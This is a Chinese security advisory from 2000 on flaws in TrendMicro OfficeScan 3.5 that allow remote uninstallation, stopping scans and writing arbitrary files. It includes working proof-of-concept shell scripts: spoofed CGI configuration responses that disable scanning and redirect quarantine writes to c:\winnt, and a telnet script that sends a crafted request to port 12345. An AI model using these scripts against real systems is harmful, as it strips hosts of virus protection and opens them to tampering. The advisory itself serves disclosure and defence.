发布日期：2000-03-06
更新日期：2000-03-07

受影响系统：

OfficeScan 3.5

描述：

---

来源：Captain'z root <gdn@neurocom.com>

    除了可能允许远程卸载的安全问题外，TrendMicro OfficeScan被发现还存在几个新的安全漏洞。
    攻击者利用OfficeScan的远程访问机制存在的安全漏洞能够进行以下操作：

    - 卸载反病毒软件
    - 启动扫描
    - 中止扫描
    - 通过远程修改扫描设置文件使病毒防护功能失效
    - 写目标主机中的任何文件。



测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

1、 利用请求命令数据包：
    首先窃听网络通信以捕获管理员与任意Scan Office端口12345的请求（数据包）。
    然后修改位于最后两个字节的命令请求类型。请求类型如下：

    03：使用远程系统中的Alert.msg文件
    04：卸载请求
    06：在主机上进行病毒扫描
    07：中止病毒扫描

2、 利用web欺骗：
    当两个反病毒服务（TmListen.exe和NTRScan.exe）运行，且请求扫描时，将访问cgiRqCfg.exe程序。该CGI程序用于传输配置文件到远程客户机。cgiRqCfg.exe程序运行返回的是根据扫描请求产生的配置文件。该文件内容以明文传送。
    通过精心构建具有相同文件结构和同名CGI的WEB服务器进行欺骗，入侵者可能会伪造配置文件传送给远程主机，以修改病毒防护设置。

    配置文件内容如下：

[Scan Now Configuration]"
UID=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
Scan Memory=0
CompressedLayer=2
ScanALLFiles=0
ExtList=.exe, .com
ScanRemoveable=0
ScanFixedDisk=0
ScanCDRom=0
VirusFoundAction=5
BkUpIfClean=0
MoveDir=MANAGER\VIRUS
CleanFailedAction=3
CleanFailedMoveDir=MANAGER\\VIRUS
Reserved=

1）修改MoveDir和CleanFailedMoveDir为TARGET\\anywhere，可使远程主机的反
   病毒软件写文件系统中的任何文件。
2）修改ScanRemoveable、ScanFixedDisk和ScanCDRom变量值为0，可使远程反病
   毒软件失去实际功能，即使服务仍在运行。
3）修改ExList变量值为".txt"，将使反病毒软件只扫描txt文本文件。

    下面是可成功实施web伪造欺骗的CGI脚本。
    
cgiRqCfg.exe:

#!/bin/sh

echo "Content-type: text/plain"
echo
echo "[Scan Now Configuration]"
echo "UID=N0thing th4nk you"
echo "Scan Memory=0"
echo "CompressedLayer=2"
echo "ScanALLFiles=0"
echo "ExtList= YES IT's POSS1bl3 !"
echo "ScanRemoveable=0"
echo "ScanFixedDisk=0"
echo "ScanCDRom=0"
echo "VirusFoundAction=5"
echo "BkUpIfClean=0"
echo "MoveDir=c:\winnt"
echo "CleanFailedAction=3"
echo "CleanFailedMoveDir=c:\winnt"
echo "Reserved="

cgiOnStart.exe
#!/bin/sh

echo  "Pragma: no-cache"
echo "Content-type: text/plain;charset=utf-8"
echo
echo "1"


初始化远程扫描的脚本：

#!/bin/sh
(
sleep 2
echo "GET /?05680F545E88AED5392B885EE7142D8BBF8E352693725430DC1E
7F954FB345FE899F01203B222CFAF8B05CA5D90CF5DEE738102AB1CAEE
E62F7F4AA36ECD20CB5EADEC2C54776650D555A9415BE5348E7F00F981
A5DBEE1F3AB30FABC433230F66B49982FDA5F077D07AF721CD7918A558
0C331BC4C2A959BF634112B4F9A93953B8F64B02C881ED6C55BFCD6205
6134BBF8007EFFB66435181A7762EE02B8913F545D2511897C898F3E53B
B8D4F4EC71E7FAC6D8E26D3E55A9A7C1EB96BDFD2BE844FC5EC65DAF
6C71C02942A92BB978AC8751202C50EE40445DD6CD11CE11A9906
HTTP/1.0"
#NOTE: The above generated numbers need to be on one line, they were
wrapped for readability
echo "Host: "$1":12345"
echo "User-Agent: OfficeScan/3.5"
echo "Accept: */*"
echo
echo
sleep 5
)| telnet $1 12345 2>&1 | tee -a ./log.txt



建议：

---

    临时解决方法：禁止TMListen.exe服务。



浏览次数：7255
严重程度：0（网友投票）